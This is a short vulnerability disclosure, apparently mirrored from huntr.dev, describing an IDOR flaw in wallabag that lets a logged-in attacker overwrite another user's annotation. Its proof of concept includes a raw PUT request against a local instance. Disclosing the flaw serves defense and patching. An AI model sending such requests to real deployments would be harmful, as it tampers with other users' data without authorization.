Lucene search

K
huntrBauh0lz8FDD9B31-D89B-4BBE-9557-20B960FAF926
HistoryJan 22, 2023 - 6:01 a.m.

IDOR vulnerability allowing to update another user's annotations

2023-01-2206:01:02
bauh0lz
www.huntr.dev
16
idor vulnerability" "updating annotations" "security bug" "data manipulation" "vulnerability discovery

EPSS

0.001

Percentile

25.5%

Description

IDOR vulnerability was discovered in wallabag.

Proof of Concept

  1. Login as a victim.
  2. Create an entry and an annotation. In this case the annotation’s ID is 3.
  3. Login as an attacker.
  4. Send the following request.

request

PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}
  1. Victim’s annotation created on step 2 is updated.

EPSS

0.001

Percentile

25.5%

Related for 8FDD9B31-D89B-4BBE-9557-20B960FAF926